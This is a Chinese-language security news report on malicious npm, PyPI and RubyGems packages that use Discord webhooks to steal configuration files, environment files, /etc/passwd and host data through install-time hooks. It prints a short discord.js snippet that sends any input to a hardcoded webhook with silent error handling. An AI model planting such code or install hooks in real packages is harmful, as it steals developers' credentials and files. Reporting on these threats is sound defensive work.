攻击者利用Discord Webhook通过npm、PyPI和Ruby软件包构建隐蔽C2通道
网络安全研究人员发现,网络犯罪分子正在利用Discord webhook作为替代性命令与控制(C2)通道,渗透主流编程语言生态系统。与传统C2服务器不同,webhook提供免费且隐蔽的数据外传渠道,能够完美隐藏在合法的HTTPS流量中。
过去一个月内,npm、PyPI和RubyGems平台上的恶意软件包已悄然窃取开发者设备和持续集成环境中的敏感文件及遥测数据。最早发现的案例是一个名为mysql-dumpdiscord的npm模块,该模块看似无害,但在安装或执行时会扫描config[.]json、[.]env和ayarlar[.]js等配置文件和环境文件,读取内容后通过HTTP POST发送至硬编码的Discord webhook URL。
攻击者控制的webhook以字符串常量形式嵌入代码,接收每个文件内容(超过1900字符的文件会被截断以适应Discord消息长度限制)。Socket.dev分析师是在网络监控发现发往discord[.]com/api/webhooks/...的POST请求异常激增后,才识别出这种攻击手法。
跨平台攻击手法
进一步调查发现第二个npm概念验证样本,该样本利用官方discord.js库实现攻击:
const { WebhookClient } = require ('discord.js');
module.exports = async function send (messages) {try {const client = new WebhookClient ({ url: 'https://discord.com/api/webhooks/1323713674971713676/…' });await client.send (messages.join(' '));} catch (e) {// 静默失败}
};
这种极简设计将传入函数的任何字符串转化为C2消息,规避了基于主机的异常域名或签名检测。
攻击者在各生态系统采用相似手法。PyPI平台上的malinssx软件包会重写setuptools中的install命令,在pip install执行时序列化越南语通知消息"Some just installed the maladicus package via pip!"并发送至Discord webhook。所有网络错误都会被捕获并忽略,正常安装流程不受影响。
RubyGems平台上被篡改的sqlcommenterrails版本会收集主机元数据(包括/etc/passwd内容、DNS服务器、当前用户和公网IP),将其格式化为多行JSON载荷通过HTTPS POST发送至webhook。错误处理同样保持静默,确保gem安装过程不被中断。
感染机制分析
这些恶意软件包利用安装时钩子实现持久化和隐蔽性。通过重写安装命令(Python的install[.]run、Ruby的gemspec钩子),恶意代码能在主机的安全控制检测到运行时行为前就执行。这种早期执行意味着敏感数据在代码分析或端点防护启动前就已外泄。
此外,利用Discord基础设施可规避静态白名单的怀疑——企业协作场景下discord[.]com的流量通常被允许,这使得受信域名变成了隐蔽的数据管道。